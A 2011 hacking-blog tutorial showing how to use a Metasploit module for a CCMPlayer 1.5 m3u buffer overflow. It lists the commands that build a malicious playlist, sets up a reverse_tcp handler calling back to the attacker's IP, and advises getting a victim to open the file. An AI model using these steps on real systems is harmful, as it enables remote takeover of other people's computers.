• 25,450
  • +1,003
  • 2,796
7 Step Hacking Windows using CCMPlayer 1.5 Vulnerability Buffer Overflow(Zeroday)

7 Step Hacking Windows using CCMPlayer 1.5 Vulnerability Buffer Overflow(Zeroday)

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows XP SP3, Vista, Windows 7(according to exploit creator)

Vulnerable Application : CCMPlayer 1.5

Exploit Credits : Rh0

This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening a m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an invalid read of an injectible address, thus allowing arbitrary code execution. This module works on multiple Windows platforms including: Windows XP SP3, Windows Vista, and Windows 7.

Requirements :

1. Vulnerable application CCMPlayer 1.5 (view download link)

Mediafire.com

2. CCMPlayer 1.5 Exploit

Mediafire.com

Step By Step :

Victim IP address : 192.168.8.91

Attacker IP address : 192.168.8.92

1. Download the vulnerable application and install it in your windows operating system and download the exploit above.

2. Open your terminal(CTRL + ALT + T) and put the exploit in the following folder

cp ccmplayer_m3u_bof.rb /pentest/exploits/framework/modules/exploits/windows/fileformat/

3. Open up your Metasploit console by typing msfconsole in your terminal and use the exploit you've just added before

7 Step Hacking Windows using CCMPlayer 1.5 Vulnerability Buffer Overflow(Zeroday)

4. The next step you can view the available switch that you can set it up manually by using show options command. Below I'm just configure the minimum options to make this exploit working.

7 Step Hacking Windows using CCMPlayer 1.5 Vulnerability Buffer Overflow(Zeroday)

Information :

set filename great-songs.m3u --> create the name of the file

set lhost 192.168.8.92 --> set up the attacker ip address

set lport 443 --> attacker local port use to connect back when there's a victim

set target 0 --> set target to CCMPlayer 1.5

exploit --> generate the malicious m3u file (the red box in pics above was the location of malicious file)

5. When you finish locating the malicious m3u file, you need to run a handler in attacker computer to handle the payload we've just create before(reverse_tcp)

7 Step Hacking Windows using CCMPlayer 1.5 Vulnerability Buffer Overflow(Zeroday)

6. After the scenario already set up, the next step we need to send the malicious file to victim computer and make sure he/she open it. Below was the picture when victim try to open the malicious m3u file.

7 Step Hacking Windows using CCMPlayer 1.5 Vulnerability Buffer Overflow(Zeroday)

7. After victim opened the malicious file, our handler will receive a new session connection with victim computer

7 Step Hacking Windows using CCMPlayer 1.5 Vulnerability Buffer Overflow(Zeroday)

PwneD!!

Countermeasure :

1. Until the day I wrote this tutorial (24 December 2011), there's still no update a.k.a zeroday…

Hope you enjoy it 🙂

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com